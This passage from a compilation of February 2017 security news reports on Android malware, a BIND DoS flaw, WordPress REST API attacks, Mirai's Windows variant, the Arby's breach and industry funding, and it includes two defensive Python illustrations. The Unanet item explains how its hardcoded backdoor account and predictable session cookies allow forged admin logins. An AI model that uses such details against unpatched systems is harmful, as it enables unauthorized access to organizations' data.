The mobile threat landscape registered changes as well last month, as the Triada modular backdoor for Android secured the first position on the Top 3 Most Wanted mobile threats. Detailed in March last year, Triada was considered the most advanced mobile malware to date.

HummingBad, an Android Trojan capable of establishing a persistent rootkit on a device and installing additional applications, dropped to the second position. Dubbed HummingWhale, a new variant of this malware was discovered a couple of weeks ago, after it managed to infect 20 apps in Google Play and supposedly infect millions of devices.

Hiddad, a piece of Android malware that repackages legitimate apps and then releases them to a third-party store, is currently the third “most wanted” mobile threat. The malware, security researchers note, was designed to display ads but can also be used to gain access to key security details built into the OS, thus enabling the attacker to obtain sensitive user data.

“The wide range of threats seen during January utilizes all available tactics in the infection chain to try and gain a foothold on enterprise networks. To counter this organizations need advanced threat prevention measures on networks, endpoints and mobile devices to stop malware at the pre-infection stage, to ensure that they are adequately secured against the latest threats,” Check Point concludes.


Israeli Startup Empow Raises $9 Million for U.S. Expansion

11.2.2017 securityweek IT

Israeli startup Empow Cyber Security announced on Thursday that it has raised $9 million in a Series A funding round. $8 million has come from private investors and $1 million from the Office of the Chief Scientist at the Israel Ministry of Economy. The money will be used primarily to expand the company's operations in North America.

Empow currently employs three staff in its Boston, Mass. office, which will be expanded, and a second office will open on the West Coast later in 2017. Both offices handle sales and marketing for the U.S. market, with R&D remaining in Ramat Gan, Israel.

Empow provides a platform that unifies separate security defenses in a more efficient and effective manner than unwieldy SIEMs. It uses security abstraction to separate the security infrastructure into primary components it calls 'security particles'. These particles are then linked together using a common language that interacts with the APIs of the different security technologies, enabling the complete security infrastructure to be viewed and treated as a single entity rather than a series of individual silos.

Without that cross-technology visibility, individual alerts from different technologies can easily be missed. A possible phishing alert in isolation could be ignored by analysts. A subtle possibility of credential misuse from a different technology could also be missed.

Empow concentrates on 'intent'. If it spots a phishing possibility in the email alerts, it knows what to look for in the network alerts; and ties the phishing and credential misuse into a threat warning for the analyst.

As new attack methodologies emerge, empow can be 'taught' to recognize the different indications in the different technologies of the customer's infrastructure. empow itself is vendor-neutral, so the infrastructure itself does not need to change -- empow's purpose is to make any infrastructure more efficient. This means it can work with any existing infrastructure, whether that is on-premise or in the cloud.

While customers can develop their own 'apps' to detect, investigate and mitigate new attack methodologies, empow also provides an app store for emerging and common issues. These currently include cross-technology indicators for threats such as ransomware, spear-phishing, privilege escalation and financial data leaks.

Avi Chesla, co-founder and CEO, explains, "Empow creates an enterprise security posture that is as robust and nimble as the attacks it aims to prevent. Our security abstraction is creating a radical change in the realm of cybersecurity, making cyber-defenses exponentially better than the sum of their parts. It's like a cyber general coordinating your security army: empow helps send the right troops into battle at the right time."


Demisto Raises $20 Million to Help Enterprises Fight Alert Fatigue

11.2.2017 securityweek Security
Demisto, a Cupertino, Calif.-based maker of software that helps Security Operations teams fight “alert fatigue” and reduce the time to respond to a breach, announced on Thursday that it has closed a $20 million Series B round of funding.

In addition to announcing the new funding, the company introduced the latest version of its security operations platform. The company’s new “Demisto Enterprise 2.0 Security Operations Platform” is an incident management platform designed to help customers integrate threat feeds and manage indicators to automate threat hunting operations.

The platform is available now with annual pricing starting at $100,000 for up to two analysts.

“Demisto was built to make security analysts’ lives easier with its combined incident response case management and security orchestration platform,” said Slavik Markovich, CEO of Demisto.

“Demisto simplifies the way enterprises manage incident response with its automated and collaborative incident response platform that delivers unprecedented insight and resolution into complex threats,” explains Jay Leek, managing director at ClearSky and former CISO of Blackstone.

According to the company, the new funds will be used to expand operations and accelerate new product development and customer rollouts, and support sales and marketing efforts.

Demisto has offices in Silicon Valley and Tel Aviv; the new round brings its total funding to $26 million.


Research Unearths 5 Secrets for Higher Performing CISOs

11.2.2017 securityweek Security
IANS Research has developed a model designed to help chief information security officers to maintain their inherent promise: that is, "to safeguard critical assets across space and time."

This model, which it calls CISO Impact, rests on two fundamental capabilities: technical excellence and organizational engagement. The former involves eight domains from access control to incident response, while the latter includes seven factors from running infosec like a business to getting the Business to own the risk.

From this model, combined with insights from more than 1,200 high-performing CISOs and information security teams, IANS has developed what it terms 'The 5 Secrets of High-Performing CISOs'.

"The connected world is a dangerous place," says Stan Dolberg, chief research officer at IANS Research, "and because of this, CISOs and their teams must lead their organizations to adopt safe business practices. However, the challenge remains that many CISOs are leading from a position of little authority or influence. The CISO Impact diagnostic provides specific ways for CISOs to assert information security leadership skills that are commonly found in organizations one step ahead on the maturity curve. Our goal is to inform, contextualize and prioritize where to invest skills, practices, and technologies. Armed with this strong guidance, CISOs can chart their own paths to leadership."

Put bluntly, the purpose of this report is to help lower performing CISOs to perform better through using the methods already used by high performing CISOs. The five secrets to achieving career success are:

Lead without authority

Embrace the change agent role

Don't wait to be invited to the party

Build a cohesive cyber cadre

It's a 5 to 7-year journey to high impact

Each of these 'secrets' is discussed in the report and supported by statistical research evidence. For example, 100% of high performers lead despite having no authority, using "persuasion, negotiation, conflict management, communication, education." Only 3% of low performers succeed in this.

For the second 'secret', the report states, "High-performing CISOs know the value of engaging to drive change. In the CISO Impact data, 3 out of 4 of high performers embrace this approach, compared to 1 in 20 of the low performers. To embrace this role, know the business, know yourself, and get ready to 'make lemonade'."

The third secret is not so widely adopted by the high performers. "More than half of high performers in the CISO Impact data set didn't wait for executives to have an epiphany that security matters," states the report. "They leveraged the power of simulation to generate the emotional experience of loss or compromise that is fundamental to an engaged executive team." Less than 1% of low performers did similar.

In secret 4, "High performers patiently assemble and train more than a team -- they culture a cyber cadre." This approach is adopted by 85% of high performers; but by only 1.4% of low performers.

The fifth secret warns that there is no quick fix. "Five to seven years is a realistic time frame for building the trust, the program, the team, and the value of information security to the point where information security is baked in."

These five secrets provide excellent advice for improving company security and enhancing CISO careers. As stand-alone research, however, the report has several problems. The first is the distinction between a high performer and a low performer. The second is that it is easier to be a high performer in some companies than it is in others.

Martin Zinaich (CSSLP, CRISC, CISSP, CISA, CISM and more), information security officer for the City of Tampa, comments: "'You must lead without authority' -- that is so very true! You have to do that both technically and from an organic business integration standpoint. Yet," he told SecurityWeek, "the study shows that 60% of high performing security leaders report into risk and business roles (that have authority) -- and 95% of lower performing CISOs report to the CIO (where they don't). Those two stats show the simple reality that it is very difficult to lead without authority. Almost every non-technical safe corporate wide business practice I have seen where the CISO is lacking authority has come via post breach, regulations or working with the Audit department."

The danger for research statistics is that some of the low performers could be high performers in a different company with more resources and/or a more receptive C-Suite.

A similar issue occurs in the fifth secret; that is, 'it's a 5 to 7-year journey to high impact'. The reality is that few CISOs will remain in one position for that long -- in fact, it is probably only the high performing CISOs already occupying a high-flying position with a security-aware company that will do so.

Such concerns, however, only affect the statistical difference between high and low performing security officers. The basic arguments contained within the five secrets remain quality advice for any CISO who wants to better secure his organization and improve his career potential.

The IANS Research report, "The 5 Secrets of High-Performing CISOs" will be presented at the RSA Conference next week.


Potentially Serious DoS Flaw Patched in BIND

11.2.2017 securityweek Vulnerability
A potentially serious denial-of-service (DoS) vulnerability was patched this week by the Internet Systems Consortium (ISC) in the BIND DNS software.

The flaw, tracked as CVE-2017-3135, affects BIND 9.8.8, all 9.9 releases since 9.9.3, all 9.10 releases, and all 9.11 releases.

In the case of servers with specific configurations, the vulnerability is remotely exploitable and rated as “high severity” with a CVSS score of 7.5.

“Under some conditions when using both DNS64 and RPZ [Response Policy Zones] to rewrite query responses, query processing can resume in an inconsistent state leading to either an INSIST assertion failure or an attempt to read through a NULL pointer,” ISC said in its advisory.

“Servers utilizing both DNS64 and RPZ are potentially susceptible to encountering this condition. When this condition occurs, it will result in either an INSIST assertion failure (and subsequent abort) or an attempt to read through a NULL pointer. On most platforms a NULL pointer read leads to a segmentation fault (SEGFAULT), which causes the process to be terminated,” ISC added.

Servers that don’t use RPZ and DNS64 at the same time are not affected by the security hole.

The vulnerability, reported by Ramesh Damodaran and Aliaksandr Shubnik of Infoblox, has been patched with the release of versions 9.9.9-P6, 9.10.4-P6 and 9.11.0-P3. Users have been advised to update their installations, but removing DNS64 or RPZ from the configuration, or restricting the contents of the policy zone, is considered a workaround.
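A way to check a deployment for the affected combination, as an added Python example that is not ISC's code: it blanks out comments and quoted strings in a named.conf fragment, looks for both a dns64 statement and a response-policy block, and compares the running version against the fixed releases named above. The named.conf sample is constructed, and the check does not follow include statements.

```python
import re

# Constructed named.conf fragment (not from the advisory): RPZ enabled in options,
# DNS64 enabled in a view, plus a commented-out dns64 line that must not count.
SAMPLE_NAMED_CONF = """\
options {
    directory "/var/named";
    recursion yes;
    // dns64 64:ff9b::/96 { clients { any; }; };   disabled here
    response-policy { zone "rpz.example"; };
};
view "internal" {
    match-clients { 10.0.0.0/8; };
    dns64 64:ff9b::/96 { clients { any; }; };
    zone "rpz.example" { type master; file "rpz.example.db"; };
};
"""

# One left-to-right pass, so a '#' inside a string or a quote inside a comment is handled.
_NOISE = re.compile(r'"[^"\n]*"|/\*.*?\*/|(?://|#)[^\n]*', re.S)


def strip_noise(conf: str) -> str:
    """Blank out comments and quoted strings so keywords inside them are ignored."""
    return _NOISE.sub(lambda m: '""' if m.group(0).startswith('"') else " ", conf)


def config_uses_dns64_and_rpz(conf: str) -> dict:
    """Report whether a dns64 statement and a response-policy block are both active."""
    clean = strip_noise(conf)
    dns64 = re.search(r"(?:^|[\s;{}])dns64\s", clean) is not None
    rpz = re.search(r"(?:^|[\s;{}])response-policy\s*\{", clean) is not None
    return {"dns64": dns64, "rpz": rpz, "both": dns64 and rpz}


# First fixed release per branch, as (major, minor, patch, P-level).
FIXED = {(9, 9): (9, 9, 9, 6), (9, 10): (9, 10, 4, 6), (9, 11): (9, 11, 0, 3)}


def parse_version(version: str) -> tuple:
    """Parse '9.10.4-P5' style strings; a missing -P suffix counts as P-level 0."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-P(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised BIND version: {version!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))


def version_affected(version: str) -> bool:
    """Affected set per the advisory: 9.8.8, 9.9.3 and later, all 9.10, all 9.11,
    up to but not including the fixed releases."""
    v = parse_version(version)
    if v[:3] == (9, 8, 8):
        return True
    branch = v[:2]
    if branch == (9, 9):
        return (9, 9, 3, 0) <= v < FIXED[branch]
    if branch in FIXED:
        return v < FIXED[branch]
    return False


def assess(version: str, conf: str) -> bool:
    """True when this server is exposed: affected version AND DNS64 combined with RPZ."""
    return version_affected(version) and config_uses_dns64_and_rpz(conf)["both"]


if __name__ == "__main__":
    print(assess("9.10.4-P5", SAMPLE_NAMED_CONF))   # True
    print(assess("9.10.4-P6", SAMPLE_NAMED_CONF))   # False
```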

The flaw was disclosed on Wednesday, but advance notifications were sent out on February 1. Linux distributions, most of which have classified this as a medium severity issue, are working on releasing patches.


Hackers Targeted Italy Foreign Ministry, Russia Accused

11.2.2017 securityweek Hacking
Rome - Italy's foreign ministry was attacked by hackers last year, a diplomatic source told AFP on Friday, amid reports that Russia could be to blame.

"After the first attack the system was immediately strengthened," said the source, who asked not to be named, after Britain's Guardian newspaper said the ministry had come under a sustained cyber offensive -- and officials suspected Russia.

Russia's foreign ministry said there were "no facts to prove this claim," according to Italian media reports.

The Italian source, who has close ties to the foreign ministry, said the attacks "did not affect the encrypted information system used to exchange the most sensitive information" but did affect "email accounts of ministry employees and the embassies".

The malware attack lasted over four months but did not affect then foreign minister Paolo Gentiloni -- Italy's current prime minister -- because he avoided using email during his mandate, the Guardian said.

Any sensitive information sent by email from the embassies would also have been protected because it would have been encrypted.

The daily said the hack was being investigated by Rome's chief prosecutor.

There have been concerns in recent weeks that Moscow has stepped up a cyber campaign against several European countries including Germany, France, Norway and the Netherlands.

Russia's alleged interference in the US presidential campaign last year by reputed hacking of Democratic Party computers and leaks of embarrassing communications raised fears the country may try to interfere in upcoming European elections.


Multi-factor authentication as mainstream

11.2.2017 SecurityWorld Security
More and more users identify themselves with a fingerprint rather than by entering a password. Multi-factor authentication (MFA) appears to be both simpler and more secure. Moreover, there is no stored list of passwords that attackers could steal. But is MFA mature enough to become mainstream?

In 2014 USAA became the first financial institution to add face and voice recognition to its mobile app, says Gary McAlum, the company's chief security officer. Fingerprint recognition followed a few months later. A year after that, 1.1 million of USAA's five million mobile banking app users were natively using multi-factor authentication.

"The current Internet security model is outdated and dying. It is based on information that is known (for example your password or your high school mascot), but all of that can now be easily discovered, for instance through data leaks from Facebook," McAlum notes. "Moving away from 'known information' is therefore absolutely essential."

"Almost every bank in the world uses multi-factor authentication as an alternative," says Avivah Litan, an analyst at Gartner. For decades multi-factor authentication took the form of a "security token", a small device that displayed a one-time password that changed every few minutes. The bank's security server ran the same algorithm and could recognize the latest correct password.

"Multi-factor authentication has always been too complicated and too expensive for wide use," says Jon Oltsik, security analyst at Enterprise Strategy Group. "What is changing now is the use of consumer technologies, above all smartphones, and the growing use of biometric factors such as the fingerprint readers in smartphones."

Defining the factors

"Multi-factor authentication is something you know, something you have and something you are, and it uses more than one of those factors," explains Michael Lynch, chief strategy officer at InAuth, a company specializing in authentication.

"Something you know is a credential such as a password. Something you have can be a security token, but in the case of mobile phones the device itself is the security token. Or it can be a computer. Something you are is biometrics, for example recognition of a fingerprint, iris, voice or pulse," Lynch explains.

Other biometric factors that are in use or under consideration include heart rate, typing speed, the pattern of blood vessels in the white of the eye or in the skin, gait, location and long-term behavioral patterns. Iris recognition, however, requires a camera with infrared imaging.

In some cases two-factor security is used. The traditional username and password combination usually counts as one factor and the device as the second, Lynch says. The new trend, however (as at USAA), is to use the mobile device as one factor and a biometric trait detected by that device as the second, with no password needed.

Lynch explains that on the desktop a so-called browser fingerprint, built from information about fonts, language, application and browser type, can serve as the second factor.

"The so-called machine fingerprint changes over time as applications are updated and patches are installed, so it usually lasts 60 days or less," which is why a bank's login requirements for desktop users can change suddenly, Lynch explains, adding that the combination of a cookie and a browser fingerprint is a more reliable method.

Cookies, he says, can last as long as the browser installation, but the computer in question may not allow them.

"You may not see the second factor, though; the bank almost always checks your computer via a cookie," Litan notes. If it does not recognize the computer, it often sends a one-time password to the user's mobile phone or e-mail address.

As for biometric factors on mobile devices, the "fingerprint ID method is significant because it is often already built in, it is convenient and users use it, but it is neither better nor worse than other ID methods," says Jim Ducharme, vice president at security firm RSA, now part of Dell EMC.

The lower popularity of methods such as voice or face recognition, he says, is due to the fact that in many cases they do not work: a voice on the subway or a face in a nightclub.

At USAA about 90% of users rely on fingerprint recognition, and the login success rate for both fingerprints and faces is above 90 percent, McAlum says.

Although voice recognition depends more on the surrounding environment, some users still prefer it, he adds. (USAA also offers access with a PIN code in case the other methods fail.)

The choice of factor, however, does not always depend on technology alone. "In some places it is not acceptable to use the face as an identifier, because clothing gets in the way or because some people consider the eye the window to the soul," explains Marc Boroditsky, vice president at Authy, which supplies authentication software.

People may also dislike fingerprint sensors for various reasons. In Brazil, he says, they are thought to suggest criminality. In some parts of Asia people believe it is unclean to touch a fingerprint sensor.

"Your identity is a personal matter, and when you start using parts of people for identification, you are touching something with complex cultural implications," Boroditsky adds.

"With almost every biometric factor there is also the question of being spied on. There is a creepy aspect to detecting users without their involvement in the process. We have to stay ahead and give customers a choice, for example to turn off location detection and add another step to the authentication process," Boroditsky says.


Windows Trojan Spreads Mirai to Linux Devices

10.2.2017 securityweek Virus
Mirai, the Linux-based malware that ensnared hundreds of thousands of Internet of Things (IoT) devices to launch one of the largest distributed denial of service (DDoS) botnets out there, has a Windows variant as well.

Mirai became popular last fall, after it targeted Brian Krebs’ blog and infrastructure provider Dyn in two of the largest DDoS attacks on record. Soon after, the malware’s source code leaked online and new variants of the Trojan were spotted, including one packing worm-like capabilities.

Although focused on Linux-based IoT devices until now, Mirai recently switched focus to Windows systems as well, Doctor Web security researchers warn. Detected as Trojan.Mirai.1, the new malware variant is written in C++ and appears capable of performing various nefarious operations, one of which involves the spreading of the Mirai botnet to Linux-based devices.

When launched on the infected Windows machine, the Trojan connects to its command and control (C&C) server and downloads a configuration file, from which it extracts a list of IP addresses. Next, the malware launches a scanner to search for the network nodes listed in the configuration file and attempts to log in to them using a list of login and password combinations from the same file.

According to Doctor Web’s security researchers, the Windows version of Mirai is capable of scanning and checking several TCP ports simultaneously (including 22, 23, 135, 445, 1433, 3306, and 3389).

As soon as it connects to one of the attack nodes (via any of the available protocols), the Trojan begins the execution of a series of commands indicated in the configuration file. However, should the connection be made via Remote Desktop Protocol (RDP), none of the instructions is executed.

What’s more, if the threat manages to connect to a Linux device via the Telnet protocol, it then attempts to download a binary file to it. This file is meant to subsequently download and launch the Mirai botnet.

The Windows version of Mirai can also abuse Windows Management Instrumentation (WMI) to execute commands on remote hosts, using inter-process communication (IPC) technology. The malware was designed to launch new processes with the Win32_Process.Create method and to create various files (such as Windows package files containing a certain set of instructions).

If Microsoft SQL Server is present on the infected machine, the malware leverages it to spawn a series of files and a user that also has sysadmin privileges. Next, the malware abuses this user and the SQL server event service to execute various malicious tasks: to launch executable files with administrator privileges, delete files, or plant icons in the system folder for automatic launch (it can also create the corresponding logs in the Windows registry).

“After connecting to a remote MySQL server, the Trojan creates the user MySQL with the login phpminds and the password phpgod, for the purpose of achieving the same goals,” Doctor Web notes. This user has the following privileges: select, insert, update, delete, create, drop, reload, shutdown, process, file, grant, references, index, alter, show_db, super, create_tmp_table, lock_tables, execute, repl_slave, repl_client, create_view, show_view, create_routine, alter_routine, create_user, event, trigger, and create_tablespace.


Unanet Backdoor Allows Unauthenticated Access

10.2.2017 securityweek Virus
A backdoor found in the default configuration of the Unanet web application allows an unauthenticated attacker to login and manipulate user accounts and the roles they maintain.

Unanet provides end-to-end services automation; its web-based software enables the management of people and projects from a single database. According to the company, it offers "one look and feel, and one connected set of applications."

The issue, Trustwave security researchers say, resides in a code branch within the Unanet product that maintains a hardcoded user, unlisted in the users table of the database. This user, they explain, was initially identified via a user enumeration vulnerability.

The user cannot log in directly but, because session cookies within Unanet function in a vulnerable manner, with zero entropy and no session timeouts, anyone can bypass the need to authenticate as this user. The construction of a Unanet session cookie, the researchers explain, includes the UserID, the username in uppercase, the roles concatenated together with '^', a static cookie value, and a digest.

What’s more, usernames and IDs were available via a user enumeration, because iterating the 'personkey' value would result in each username and id echoing into an error page that an attacker could parse to determine the list of existing usernames within the system.

Because user roles are known, since they exist within the 'Roles' tab in the preferences section, researchers managed to identify 19 roles within the environment, although they aren’t specifically associated with each user. However, researchers say that the possible permutations of users and roles can be brought down to around 5! permutations, meaning they can be determined using brute force attacks.

At this point, with the userID, usernames, and roles already discovered, all that an attacker needs to determine a Unanet session cookie is the special cookie value, which is referred to as a nonce (a value that, in principle, should be used only once). This value, however, is set to a default, although Unanet suggests it should be changed.

As long as the value hasn’t been changed, “the hidden cookie value can be brute forced offline, using the knowledge of all other values. This is true because the algorithm for generating the digest is known and when userID, username, roles, and digest are known it becomes a simple problem of solving for the single missing variable,” Trustwave security researchers explain.

User unanet (id 0), however, is not handled in the same way, and the researchers discovered that, if the personkey was zero, it would go to the makeadmin section, and that the method generated a new person 'unanet' and assigned the password 'UNANET' to it. Additionally, it called the 'setUnanetAdministrator(true)' method.

Armed with the UserID, Username, and the secret group __unanetAdministrator__, the researchers managed to generate the digest and reveal the cookie, and then to login using the user. The main issue, they say, is that anyone can use this method to access a Unanet system.

“This is not some deep, arcane issue. Anyone having access to a Unanet system is capable of generating the same conclusion via a simple code review. Additionally, even if the cookie 'nonce' was changed, any user of the system (or attacker who intercepts a request) is capable of brute forcing the new nonce offline. Currently any system that has not changed their cookie 'nonce' is vulnerable to an unauthenticated attacker being able to login with unanetAdministrator privileges,” the researchers mention.
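The cookie design described above, as an added Python illustration that is not Unanet's code and does not reproduce its digest algorithm: a constructed cookie derived only from identity fields plus a deployment-wide static value, beside a hardened store that issues random, server-tracked, expiring tokens. The field layout, the default value and all names are assumed for illustration.

```python
import hashlib
import hmac
import secrets
import time
from typing import Dict, List, Optional

# Hypothetical default standing in for a deployment-wide "cookie value" left unchanged.
DEFAULT_STATIC_VALUE = "changeme"


def weak_session_cookie(user_id: int, username: str, roles: List[str],
                        static_value: str = DEFAULT_STATIC_VALUE) -> str:
    """Constructed model of the weak design: every input is either public (id, name, roles)
    or static, so the cookie for a given user is identical on every login (zero entropy),
    never expires, and with the digest algorithm known the static value is the only
    unknown input. Not Unanet's actual format or algorithm."""
    fields = f"{user_id}|{username.upper()}|{'^'.join(roles)}"
    digest = hashlib.sha256(f"{fields}|{static_value}".encode()).hexdigest()
    return f"{fields}|{digest}"


class HardenedSessionStore:
    """Hardened counterpart: the token carries no identity and is not derived from any
    user field; it comes from a CSPRNG, is resolved server-side, idles out, and can be
    revoked, so nothing about it can be reconstructed offline."""

    def __init__(self, idle_timeout: int = 900):
        self.idle_timeout = idle_timeout
        self._sessions: Dict[str, dict] = {}   # token -> {user_id, roles, last_seen}

    def create(self, user_id: int, roles: List[str], now: Optional[float] = None) -> str:
        token = secrets.token_urlsafe(32)      # 256 bits of entropy per session
        self._sessions[token] = {"user_id": user_id, "roles": list(roles),
                                 "last_seen": now if now is not None else time.time()}
        return token

    def lookup(self, token: str, now: Optional[float] = None) -> Optional[dict]:
        now = now if now is not None else time.time()
        # Constant-time comparison rather than a direct dict hit, so the lookup does not
        # leak partial matches through timing.
        match = next((t for t in self._sessions if hmac.compare_digest(t, token)), None)
        if match is None:
            return None
        sess = self._sessions[match]
        if now - sess["last_seen"] > self.idle_timeout:
            del self._sessions[match]          # expired: force a fresh login
            return None
        sess["last_seen"] = now
        return {"user_id": sess["user_id"], "roles": list(sess["roles"])}

    def revoke(self, token: str) -> None:
        self._sessions.pop(token, None)
```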

At the moment, there are around 1600 public facing instances of Unanet that are potentially affected by this issue, Trustwave says. By exploiting the issue, an attacker could access the system and remove users, change roles, and create a new administrator. Using these privileges, the attacker can deny availability, compromise integrity, and remove confidentiality, the security researchers say.

The issue was patched in Unanet versions 10.0.51, 10.1.43, and 10.2.5.


Hundreds of Arby's Restaurants Hit by Card Breach

10.2.2017 securityweek Incident
Arby’s Restaurant Group, one of the largest fast food sandwich restaurant chains in the United States, admitted this week that its payment processing systems had been breached by cybercriminals.

Arby’s told journalist Brian Krebs, who learned about the incident from sources in the financial industry, that it was alerted to the breach in mid-January by industry partners. The company said it had not disclosed the incident to the public at the FBI’s request.

The fast food chain said it immediately brought in Mandiant and other security experts to remove the malware from its systems and investigate the incident. The company is confident that the compromised systems have been cleaned up.

The investigation is ongoing, but the breach appears to have affected Arby’s corporate-owned restaurants and not franchised locations. Of Arby’s more than 3,300 stores in the U.S., over 1,000 are corporate restaurants, but not all of them are impacted.

It is unclear how many payment cards may have been stolen, but Krebs is aware of an alert from PSCU, a credit union service organization with over 800 members, which warned that more than 355,000 credit and debit cards issued by its members were compromised in a breach at a major fast food restaurant chain.

The PSCU alert estimated that the breach occurred between October 25, 2016 and January 19, 2017.

Arby’s is not the only major fast food restaurant chain targeted by cybercriminals. Wendy’s launched an investigation in January 2016 and initially determined that roughly 300 of its restaurants had been hit by a hacker attack that started in 2015.

Wendy’s later determined that the actual number of affected locations exceeded 1,000 and experts believe the incident affected hundreds of thousands of cards.


Cisco Launches "Umbrella" Secure Internet Gateway

10.2.2017 securityweek Safety
Cisco announced this week the launch of Umbrella, a cloud-based Secure Internet Gateway (SIG) solution designed to provide visibility and protection for devices on and outside the corporate network.

Organizations are increasingly relying on software-as-a-service (SaaS) products, such as WebEx, Office 365, Google Docs, Salesforce and Box. While these applications can significantly improve productivity, they are often used over untrusted Internet connections without being protected by a VPN.

Cisco wants to address this problem with the launch of Umbrella. The new cloud service aims to provide safe and secure access from anywhere, even if a VPN is not used.

The networking giant obtained the Umbrella technology when it acquired OpenDNS in 2015. The company said the new product combines the original technology with machine learning models designed for uncovering threats and blocking malicious connections on the DNS and IP layers, Cisco Talos threat intelligence, and Advanced Malware Protection (AMP) technology for detecting and blocking malicious files in the cloud.

With Umbrella, Cisco promises enhanced visibility and control, including for sensitive data in SaaS applications via Cloudlock technology, and intelligence from the more than 100 billion requests resolved every day.

Cisco said the cloud-based SIG provides reliable and fast connectivity, and it can be easily integrated with existing appliances, intelligence platforms and custom tools.

“Umbrella was built upon the OpenDNS platform, a platform that has been delivered from the cloud since its inception. Then we integrated technology from across the Cisco security portfolio, including capabilities from the Cloud Web Security proxy, and the Advanced Malware Protection (AMP) file inspection,” said Brian Roddy, who oversees Cisco’s Cloud Security Business. “These technologies haven’t just been stitched together, but re-engineered to be delivered within Umbrella, so that they’re easy to use and able to deliver even more effective security.”


WordPress Flaw Exploited for Remote Code Execution

10.2.2017 securityweek Exploit
A recently patched WordPress vulnerability has been used to deface roughly 1.5 million web pages and experts have also started seeing attempts to exploit the flaw for remote code execution.

The flaw in question was patched on January 26 with the release of WordPress 4.7.2, but its existence was only disclosed one week later in an effort to give users enough time to update their installations.

The security hole affects the REST API and it has been described as a privilege escalation and content injection vulnerability. It allows attackers to modify the content of any post or page, and it can also be exploited for arbitrary PHP code execution.

Despite WordPress developers giving users a week to update their installations and working with service providers to block exploitation attempts, many websites that don’t have automatic updating enabled are still vulnerable to attacks.

A majority of the attacks spotted so far are part of defacement campaigns conducted by script kiddies looking to boost their online reputation. In the first days after exploits were made public, Sucuri researchers observed four campaigns in which more than 60,000 pages had been defaced.

The number has increased significantly and WordPress security firm WordFence reported on Thursday that it had spotted roughly 1.5 million defaced pages in attacks carried out by 20 different hackers.

WordFence pointed out that none of these hackers had managed to deface too many websites at once before the disclosure of this WordPress vulnerability. Several exploits have been used in the recent attacks and, in some cases, the attackers had found ways to bypass the rules deployed by firewall vendors.

While defacement attacks are not easy to monetize, researchers at Sucuri have started seeing other types of operations involving the REST API flaw.

The vulnerability cannot be directly used for code execution. However, WordPress plugins that allow users to insert PHP code directly into posts can be combined with the flaw to achieve this. Sucuri has seen exploitation attempts against websites that have plugins such as Insert PHP and Exec-PHP, both of which have over 100,000 active installs.

“Defacements don’t offer economic returns, so that will likely die soon,” explained Daniel Cid, founder and CTO of Sucuri. “What will remain are attempts to execute commands (RCE) as it gives the attackers full control of a site – and offers multiple ways to monetize – and SPAM SEO / affiliate link / ad injections. We are starting to see them being attempted on a few sites, and that will likely be the direction this vulnerability will be misused in the coming days, weeks and possibly months.”


Arby’s Restaurant Group confirmed a massive card breach hit its stores
10.2.2017 securityaffairs Incident

Arby’s Restaurant Group, one of the largest fast food sandwich restaurant chains in the US, confirmed that its PoS systems had been breached by crooks.
Hundreds of Arby’s restaurants suffered a card breach. The Arby’s Restaurant Group is the second-largest quick-service fast-food sandwich restaurant chain in the US; Arby’s has more than 3,330 stores in the United States, one-third of which are directly owned by the company.

Brian Krebs first learned about the card breach from his sources in the financial industry; later, representatives from the group confirmed the incident to him. Arby’s discovered the security breach in mid-January, when it was alerted by industry partners.

“Sources at nearly a half-dozen banks and credit unions independently reached out over the past 48 hours to inquire if I’d heard anything about a data breach at Arby’s fast-food restaurants. Asked about the rumors, Arby’s told KrebsOnSecurity that it recently remediated a breach involving malicious software installed on payment card systems at hundreds of its restaurant locations nationwide,” wrote Brian Krebs.

Why was the incident disclosed only now?

According to the company, the card breach was publicly disclosed only now due to an explicit request made by the FBI.

“A spokesperson for Atlanta, Ga.-based Arby’s said the company was first notified by industry partners in mid-January about a breach at some stores, but that it had not gone public about the incident at the request of the FBI.” continues Krebs.

“Arby’s Restaurant Group, Inc. (ARG) was recently provided with information that prompted it to launch an investigation of its payment card systems,” the company said in a written statement provided to KrebsOnSecurity.

“Upon learning of the incident, ARG immediately notified law enforcement and enlisted the expertise of leading security experts, including Mandiant,” their statement continued. “While the investigation is ongoing, ARG quickly took measures to contain this incident and eradicate the malware from systems at restaurants that were impacted.”

The company hired Mandiant and other security experts to sanitize its systems and investigate the card breach. At the time I was writing, the company confirmed that its systems had been cleaned up.

“Although there are over 1,000 corporate Arby’s restaurants, not all of the corporate restaurants were affected,” said Christopher Fuller, Arby’s senior vice president of communications. “But this is the most important point: That we have fully contained and eradicated the malware that was on our point-of-sale systems.”

Crooks used malware to compromise PoS systems at the Arby’s Restaurant Group; it is not clear how many payment cards may have been affected.

According to Krebs, who is aware of an alert from PSCU, more than 355,000 credit and debit cards issued by its members were compromised in a card breach at a major fast food restaurant chain.

The PSCU dated the card breach in the period between October 25, 2016 and January 19, 2017.

In July 2016, another major fast food restaurant chain suffered a card breach: the Wendy’s fast-food chain determined that roughly 1,000 of its restaurants had been breached by cyber criminals.


DDoS attacks have reached their peak

10.2.2017 SecurityWorld Cyber attack
DDoS attacks made considerable progress in the last three months of 2016 -- the new trend is attacks launched through large botnets made up of vulnerable Internet of Things (IoT) devices.

According to a Kaspersky Lab report, during the last quarter of last year analysts recorded botnet DDoS attacks in 80 countries, compared with only 67 in the previous quarter.

The list of the 10 countries with the most DDoS victims changed: Italy and the Netherlands were replaced by Germany and Canada. Three Western European countries (the Netherlands, the United Kingdom and France) remained, for the second quarter in a row, among the top 10 countries hosting the most C&C servers, joined in the last quarter by Bulgaria and Japan.

The longest DDoS attack of the last quarter lasted 292 hours (over 12 days), making it the record holder for 2016. The highest number of DDoS attacks in a single day was recorded on Saturday, November 5.

Overall, the last three months of 2016 were marked by unusual DDoS attacks against diverse targets, including companies such as Dyn (domain name system), Deutsche Telekom and several large Russian banks.

These companies became the first victims of a new trend: DDoS attacks launched through large botnets made up of vulnerable Internet of Things (IoT) devices. The Mirai attack is one example. The approach chosen by the authors of Mirai served as the basis for many other botnets built from infected IoT devices.

The growing number of attacks involving IoT devices was only one of the trends of the last quarter. Over the three months there was a significant drop in the number of amplification DDoS attacks, which were widely used in the first half of last year. The reason may be better protection against such attacks and fewer vulnerable servers for cybercriminals to target.

The gap left by amplification attacks was quickly filled by application-layer attacks, such as WordPress Pingback attacks. Detecting application-layer attacks is a much more complex process, because the attack imitates the activity of real users.

